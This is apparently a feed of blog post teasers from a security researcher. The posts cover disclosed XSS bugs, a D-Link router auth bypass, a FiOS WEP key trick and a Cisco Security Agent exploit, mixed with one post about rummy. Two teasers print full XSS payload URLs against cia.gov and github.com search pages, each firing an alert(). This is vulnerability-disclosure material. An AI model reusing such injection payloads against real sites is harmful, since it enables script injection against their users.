CIA.gov and Recovery.gov XSS
https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/)...
View ArticleGitHub XSS
http://github.com/search?q=python&type=Everything&repo='"><script>alert(/pwned/)</script>
View ArticleD-Link DIR-615 Remote Exploit
D-Link’s DIR-615 Wireless N Router (http://www.dlink.com/products/?pid=565) contains a flaw that allows attackers to access administrative functions without authorization. By simply requesting a...
View ArticleOld FiOS WEP Key Trick
Started cleaning out some old code and found this. It was a quick little trick to decrypt (some) FiOS WEP keys, not sure if it still works.
View ArticleGoogle Adsense XSS
Not sure when this got reported or fixed, but I guess I missed the reward by a day....
View ArticleUsing Python and PEFile to Extract Embedded Code
I’ve been cleaning old code again and I think it’s been long enough that I can release this now. I used it to extract code that was embedded within the Cisco Security Agent Management Console (CSAMC)....
View ArticleRandom XSS
I have a bad habit of saving these little random bugs and telling myself that I ‘may have a need for them later’. I think thats just the paranoid security guy in me, but then again I do the same for...
View ArticleGetting schooled in rummy.
My wife and I are playing a “never ending” game of rummy and being the geek I am, I decided to keep track of our game play so we can chart our progress. Needless to say my wife is kicking my ass and...
View ArticleCisco Security Agent Management Console ‘st_upload’ Exploit.
Here is my proof-of-concept exploit for the Cisco Security Agent Management st_upload Remote Code Execution Vulnerability (ZDI-11-088) I reported to ZDI a little while back. CVE ID: CVE-2011-0364
View Article